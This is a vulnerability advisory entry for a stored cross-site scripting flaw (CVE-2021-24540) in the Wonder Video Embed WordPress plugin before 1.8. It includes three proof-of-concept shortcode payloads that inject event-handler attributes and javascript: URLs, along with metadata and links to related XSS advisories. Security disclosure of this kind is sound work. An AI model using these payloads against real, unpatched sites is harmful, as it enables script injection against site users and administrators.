Wonder Video Embed < 1.8 – Contributor+ Stored XSS | CVE 2021-24540 | Plugin Vulnerabilities

Description

The plugin does not escape parameters of its wonderplugin_video shortcode, which could allow users with a role as low as Contributor to perform Stored XSS attacks.

Proof of Concept

[wonderplugin_video iframe='youtube.com?v=dQw4w9WgXcQ" onload="alert(1)' videocss='animation-name:twentytwentyone-close-button-transition" onanimationend="alert(2)']

[wonderplugin_video iframe="javascript:alert('wistia')"]

[wonderplugin_video videotype="mp4" lightbox="a" mp4="javascript:alert(3)" videowidth="100" videoheight="100" webm='" style="animation-name:twentytwentyone-close-button-transition;display:block;width:100px;height:100px;" onanimationend="alert(4)']

Affects Plugins

wonderplugin-video-embed

Fixed in 1.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

67910e5d-ea93-418b-af81-c50d0e05d213

Timeline

Publicly Published

2021-07-19 (about 2 years ago)

Added

2021-07-19 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2021-09-27

Title

Wappointment < 2.2.5 - Unauthenticated Stored Cross-Site Scripting

Published

2014-08-01

Title

Image Resizer - Cross Site Scripting

Published

2021-12-13

Title

Lets Box < 1.13.3 - Reflected Cross-Site Scripting

Published

2024-01-24

Title

PDF Poster - PDF Embedder Plugin for WordPress < 2.1.18 - Reflected Cross-Site Scripting

Published

2024-03-18

Title

Tourfic < 2.11.8 - Reflected Cross-Site Scripting